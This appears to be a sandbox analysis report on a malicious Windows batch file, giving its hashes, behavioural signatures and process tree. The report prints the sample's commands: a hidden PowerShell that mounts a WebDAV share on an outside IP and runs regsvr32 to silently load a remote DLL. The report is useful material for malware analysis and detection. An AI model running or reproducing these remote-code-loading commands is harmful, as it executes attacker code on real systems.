Analysis
  max time kernel: 119s
  max time network: 121s
  platform: windows7_x64
  resource: win7-20240708-en
  resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted: 23/07/2024, 08:22
Static task: static1
Behavioral task: behavioral1
  Sample: 188801557063505556.bat
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: 188801557063505556.bat
  Resource: win10v2004-20240709-en
General
  Target: 188801557063505556.bat
  Size: 23KB
  MD5: 8e9c8e3250b7a2cbe19b77dbbcdb3420
  SHA1: 9f7dcfb3b726549c38addb5e397dce1826d40753
  SHA256: ff83e8daabc6d19fa7b967227d331950622d9c9a10334d5bc7030d0d9fd22a08
  SHA512: c0f5a0640bb42fd34b92998b334aec40ca31509a3b16e93907f22c3dd3d0d27adcc9e58eba685ce3148eebdf1411e6f490e258bec6740fa3598f48abc017f3b8
  SSDEEP: 384:+tZmEQtnt8TcDAtJ9NPcRdUtOp7etAKqDLHj0sMqFVqkMwlmbzOtRij9O:+tZmEQtn/EPjtOwID0sM8VkWmvOtRi5O
Malware Config
Signatures
  Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Runs PowerShell with the display window hidden.
    pid 2732  Process powershell.exe
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  Runs net.exe
  Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid 2732  Process powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description: Token: SeDebugPrivilege  pid 2732  Process powershell.exe
  Suspicious use of SetWindowsHookEx (5 IoCs)
    pid 2788  Process wordpad.exe  (5 events)
  Suspicious use of WriteProcessMemory (14 IoCs)
    description                         pid   Process          procid_target
    PID 2236 wrote to memory of 2788    2236  cmd.exe          31  (3 events)
    PID 2236 wrote to memory of 2732    2236  cmd.exe          32  (3 events)
    PID 2732 wrote to memory of 2440    2732  powershell.exe   34  (3 events)
    PID 2732 wrote to memory of 2556    2732  powershell.exe   35  (5 events)
Processes
  C:\Windows\system32\cmd.exe
    command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\188801557063505556.bat"
    PID: 2236
    - Suspicious use of WriteProcessMemory
    C:\Program Files\Windows NT\Accessories\wordpad.exe
      command line: "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      PID: 2788
      - Suspicious use of SetWindowsHookEx
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\15998104686307.dll
      PID: 2732
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net.exe
        command line: "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        PID: 2440
      C:\Windows\system32\regsvr32.exe
        command line: "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\15998104686307.dll
        PID: 2556